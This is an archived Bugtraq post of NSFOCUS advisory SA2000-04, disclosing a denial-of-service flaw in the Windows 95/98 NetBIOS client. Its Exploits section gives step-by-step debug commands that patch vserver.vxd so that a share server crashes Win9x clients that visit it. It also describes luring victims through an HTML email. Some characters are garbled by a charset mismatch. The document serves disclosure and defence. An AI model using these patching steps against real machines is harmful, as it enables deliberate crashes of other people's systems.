From security@NSFOCUS.COM Fri Oct 13 12:31:44 2000 From: Nsfocus Security Team To: BUGTRAQ@SECURITYFOCUS.COM Date: Thu, 12 Oct 2000 11:22:44 +0800 Subject: [BUGTRAQ] NSFOCUS SA2000-04: Microsoft Win9x client driver type comparing vulnerability [The following text is in the "GB2312" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] NSFOCUS Security Advisory(SA2000-04) Topic£ºMicrosoft Win9x client driver type comparing vulnerability Release Date£º Aug 20, 2000 Update Date£º Oct 11, 2000 Affected System: ================ - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 98 Second Edition Non-affected system£º =================== - Microsoft Windows NT - Microsoft Windows 2000 Impact: ========= NSFOCUS security team has found a security flaw in Microsoft Win9x NETBIOS client. Exploitation of this vulnerability , a malicious attacker can modify his file share service and perform DoS attack to a Win9x client that visits it. Description£º ============ When Win9x client accessing NETBIOS file shared services and comparing the driver types, if the returned type from server is none of below:"£¿£¿£¿£¿£¿"," A£º"," LPT1£º" ," COMM"or"IPC"£¬it will lead to the sixth result, which is fake cause there are only five of them. So, win9x client will get a wrong driver pointer from conversion, transfer the control to the wrong driver function address and finally crash. Malicious user can send an HTML email to his target. One sample file is like this: hello When a win9x client read the malicious HTML email with outlook express or other email client with HTML support, the client will be DoS. Exploits: ========== You can do like this(windows 98 Secondary Edition, English version): D:\WIN98\SYSTEM>debug vserver.vxd -d 2b60 1266:2B60 3C 01 75 24 8B C8 C1 E9-10 83 F9 6A 73 05 83 F9 <.u$.......js... 1266:2B70 64 73 1B 83 F9 13 72 10-83 F9 1F 76 0C 80 7F 3E ds....r....v...> 1266:2B80 05 73 05 83 F9 58 77 21-C3 66 B8 03 38 C3 83 F9 .s...Xw!.f..8... 1266:2B90 65 74 10 83 F9 68 74 32-83 F9 67 75 1B B8 03 38 et...ht2..gu...8 1266:2BA0 1A 00 C3 B8 03 38 1E 00-C3 83 F9 6E 74 10 83 F9 .....8.....nt... 1266:2BB0 70 74 11 83 F9 6C 74 12-B8 03 38 1F 00 C3 B8 01 pt...lt...8..... 1266:2BC0 00 02 00 C3 B8 03 38 27-00 C3 B8 03 38 15 00 C3 ......8'....8... 1266:2BD0 91 FE 48 32 75 0E 83 78-2A 00 74 08 8D 40 2A E8 ..H2u..x*.t..@*. -n vserver.bak (backup) -w Writing 1B8F8 bytes -n vserver.vxd -e 2b60 33 c0 c3 -w Writing 1B8F8 bytes -q reboot the machine. Set a password for a shared directory . Access the share directory from another win9x client. Usually the client will get "blue screen" ,then the system will become unstable or halt. Workaround: ==================== Don't access the untrusted host's file share service. Disable NetBIOS over TCP/IP. Solutions: ==================== Microsoft has been informed. DISCLAIMS: ========== THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY. (c) 1999-2000 Nsfocus. All rights reserved. Terms of use. Nsfocus Security Team NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)